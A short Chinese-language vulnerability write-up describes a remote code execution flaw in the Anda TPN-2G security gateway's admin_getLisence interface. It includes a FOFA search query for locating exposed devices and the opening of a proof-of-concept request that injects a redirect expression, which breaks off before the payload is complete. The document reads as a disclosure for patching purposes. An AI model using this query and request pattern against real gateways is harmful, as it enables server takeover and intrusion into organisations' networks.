0x01 产品简介
TPN-2G是上海安达通信息安全技术股份有限公司的一款安全网关设备。安达通作为全网行为管理的引领者,再次推出新一代全网行为管理TPN-2G系列产品!全网行为管理TPN系统将上网行为管理、内网安全管理、主机安全管理融为一体,借助处于网络边界位置的TPN安全网关和安装在每台主机上的“主机威胁引擎”的联动防御,将“本地局域网—远地局域网—移动接入节点”的资源和安全策略进行统一管理,一体化解决互联网访问行为、内网安全行为、主机安全行为的统一管理问题,确保用户网络平台的可信、可控、可管。
0x02 漏洞概述
在安达通 TPN-2G 安全网关中发现了一处远程代码执行漏洞,攻击者可以通过admin_getLisence接口直接恶意的表达式执行shell命令,获取服务器权限。 经过分析与研判,该漏洞利用难度低,能够造成远程命令执行,建议尽快修复。
0x03 复现环境
FOFA:title="TPN-2G" || title="SJW74"
0x04 漏洞复现
PoC
GET /lan/admin_getLisence?redirect:$